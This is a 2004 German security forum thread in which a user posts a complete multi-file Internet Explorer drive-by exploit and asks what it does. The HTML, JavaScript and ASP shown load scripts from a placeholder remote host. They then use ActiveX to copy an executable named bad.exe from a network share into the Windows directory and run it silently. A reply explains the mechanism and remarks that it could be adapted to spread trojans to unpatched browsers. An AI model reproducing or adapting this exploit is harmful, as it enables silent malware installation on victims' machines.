[HaBo]
| Virenschutz · Tools & Aggressive Software Tips zum Kampf gegen gegen Viren, Trojaner, CryptoSoft und Programme, die erstellt wurden um Schaden anzurichten, werden hier behandelt. Aber auch Tools aus dem Security Bereich sind hier richtig. |
Internet Explorer Remote Exploit
Diskussion: Internet Explorer Remote Exploit im Forum Virenschutz · Tools & Aggressive Software, in der Kategorie Security Area; Anzeige Hi Leute, Ich bin heute auf diesen Exploit gestoßen, kann mir bitte einer sagen was ich mit diesem Exploit ...
 |
26.07.04, 12:40
| #1 (permalink) |
| Registriert seit: 10.07.04  Likes: 0 |  Internet Explorer Remote Exploit Anzeige Hi Leute, Ich bin heute auf diesen Exploit gestoßen, kann mir bitte einer sagen was ich mit diesem Exploit machen kann? Code: ----------------------------------------------------- default.htm -------------------------------------------------------
<html>
<body>
<img src="cc.exe" width=0 height=0 style=display:none>
<script language="Javascript">
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-1000\;dialogLeft:-1000\;dialogHeight:1\;dialogWidth:1\;").
location="vbscript:\"<SCRIPT SRC='http://IPADDRESS/shellscript_loader.js'><\/script>\"";
}
</script>
<script language="javascript">
setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.asp" style=display:none;></IFRAME>');
</script>
</body>
</html>
--------------------------------------------------------- md.htm ---------------------------------------------------------
<SCRIPT language="javascript">
window.returnValue = window.dialogArguments;
function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();}
setTimeout("CheckStatus()",100);
}
CheckStatus();
</SCRIPT>
--------------------------------------------------- shellscript_loader.js ---------------------------------------------------
function getRealShell() {
myiframe.document.write("<SCRIPT SRC='http://IPADDRESS/shellscript.js'><\/SCRIPT>");
}
document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);
------------------------------------------------------- shellscript.js -------------------------------------------------------
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language="JScript" DEFER>
var rF="\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe";var wF="%windir%\\\\_tmp.exe";var
o=new ActiveXObject("wscript.shell");var e="%comspec% /c copy "+rF+" "+wF;var err=o.Run(e,0,true);if(err==0)
o.Run(wF,0,false);</script>');
}
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
--------------------------------------------------------- redir.asp ----------------------------------------------------------
<%
Response.Expires = 1
Response.Expiresabsolute = Now() - 1
Response.AddHeader "pragma","no-cache"
Response.AddHeader "cache-control","private"
Response.CacheControl = "no-cache"
For x = 1 to 500000 'Time
z = z + 10
Next
Response.Status = "302 Found"
Response.AddHeader "Content-Length", "4"
Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm"
%> |
|  |
|
26.07.04, 20:24
| #2 (permalink) | |
| Guest Likes: | Also, hier wird mit Hilfe von "iframes", "ActiveX" und vbScript eine Datei names "bad.exe" vom Server geladen aus dem Ordner "\\\IP\\\NULLSHAREDFOLDER\\\" geladen und beim Betrachter der Seite im Ordner "%windir%" abgelegt. Zitat:
Dies in eigentlich mehr ein Ausnutzen von Sicherheitslücken wie aktiviertes ActiveX und iframe-Vulnerablity und aktivierte vbScripting als ein richtiger Exploit. Aber mit ein paar Änderungen kannst Du das Script Deinen Bedürfnissen anpassen und dann als Verteiler für Trojaner usw. bei ungepatchten IE einsetzen. Das hast bestimmt irgendwo als "PoC" (= Proof of Concept) und/oder Lehrbeispiel gefunden. MfG Rushjo | |
| |
|
| - Anzeige - | |
|
[HaBo] » Security Area » Virenschutz · Tools & Aggressive Software » Internet Explorer Remote Exploit
| Themen-Optionen | |
| Ansicht | |
Linear-Darstellung
| |
Ähnliche Themen | ||||
| Thema | Autor | Forum | Antworten | Letzter Beitrag |
| Internet und Remotedesktop funktionieren, aber es wird keine Seite im Internet Explorer angezeigt! | aronsoft | Windows | 9 | 04.06.09 10:23 |
| Remote Exploit für Win 2003 | brave_snoopy | (In)security allgemein | 3 | 06.04.06 23:19 |
| Exploit für Internet Explorer testen? | hunterb21 | (In)security allgemein | 1 | 31.05.04 03:20 |
| Versuche mit dem ASN.1 Remote DoS Exploit | hunterb21 | (In)security allgemein | 0 | 17.02.04 13:35 |
